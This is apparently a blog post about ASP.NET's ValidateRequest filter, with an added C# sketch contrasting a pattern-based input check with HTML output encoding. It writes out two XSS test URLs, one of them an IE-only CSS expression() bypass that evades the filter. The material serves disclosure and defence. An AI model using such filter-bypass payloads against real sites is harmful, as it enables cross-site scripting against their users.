.Net XSS protection (ValidateRequest) insecure - important if you're relying on it

kepler

Lots of sites have been using ValidateRequest for a while, assuming it was secure. Unfortunately, it isn't.

E.g. if you try the following on a site with ValidateRequest active...

http://andy/xsstests/default.aspx?fname=<script>alert('xss')</script>

…you should see that the .NET validation raises an error “A potentially dangerous Request.QueryString value was detected from the client (fname="<script>alert('xss')...").”

However, if you were to follow the link below for the same page, still with ValidateRequest enabled… (IE only, but still...)

http://andy/xsstests/default.aspx?fname=<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

It'll execute perfectly happily.

It's still worth using ValidateRequest to deter automated attackers in the short term, but even bots will get wise to it soon enough.

For more detailed information, see the whitepaper which disclosed it.
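
Added example (not part of the original post, and not Microsoft's code): a C# console sketch of why the two fname values above are treated differently by a pattern-based input check, and how HTML-encoding at output handles both. `LooksDangerous` is a simplified, assumed stand-in for request validation, and `RenderGreeting` is a hypothetical page fragment.

```csharp
using System;
using System.Net;

static class ValidateRequestDemo
{
    // Simplified stand-in for a request-validation blocklist (an assumption,
    // not the framework's real implementation): flag '<' followed by an
    // ASCII letter, '!', '/' or '?', and the sequence "&#".
    static bool LooksDangerous(string value)
    {
        for (int i = 0; i + 1 < value.Length; i++)
        {
            char c = value[i], next = value[i + 1];
            bool asciiLetter = (next >= 'a' && next <= 'z') || (next >= 'A' && next <= 'Z');
            if (c == '<' && (asciiLetter || next == '!' || next == '/' || next == '?'))
                return true;
            if (c == '&' && next == '#')
                return true;
        }
        return false;
    }

    // Output encoding for an HTML text node. It does not need to recognise
    // which inputs are dangerous; every markup character is neutralised.
    static string RenderGreeting(string fname)
    {
        return "<p>Hello, " + WebUtility.HtmlEncode(fname) + "</p>";
    }

    static void Main()
    {
        // The two fname values quoted in the post above.
        string[] samples =
        {
            "<script>alert('xss')</script>",
            "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>"
        };

        foreach (string fname in samples)
        {
            Console.WriteLine("input:    " + fname);
            Console.WriteLine("flagged:  " + LooksDangerous(fname));
            Console.WriteLine("rendered: " + RenderGreeting(fname));
            Console.WriteLine();
        }
    }
}
```

The encoded output contains no raw `<` or `>` for either input, so the result does not depend on whether the input check recognised the value.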
 